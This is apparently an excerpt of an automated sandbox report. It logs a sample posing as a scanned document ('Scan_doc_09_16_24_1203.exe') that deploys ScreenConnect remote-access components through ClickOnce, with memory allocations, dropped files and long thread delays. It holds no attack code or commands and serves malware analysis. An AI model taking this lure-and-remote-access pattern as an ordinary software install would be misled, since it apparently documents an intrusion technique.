                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 261F55C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 261F7020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 8D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1A2E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 1830000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 3350000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 3180000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 1C40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 1E10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeMemory allocated: 1C40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1B320000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1630000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeMemory allocated: 1AE20000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599780Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599669Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599411Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599290Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599184Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598926Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597977Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597630Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597512Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597368Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597253Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596358Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595365Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593561Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593230Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593114Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592760Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592639Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592531Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6662Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe TID: 7136Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599780s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599669s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599411s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599290s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -599184s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -598926s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -598094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597977s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597630s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597512s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597368s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597253s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -597015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596358s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -596030s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -595516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -595365s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -595015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594452s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -594000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593561s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593230s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -593114s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -592953s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -592760s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -592639s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536Thread sleep time: -592531s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 332Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe TID: 7472Thread sleep time: -922337203685477s >= -30000s
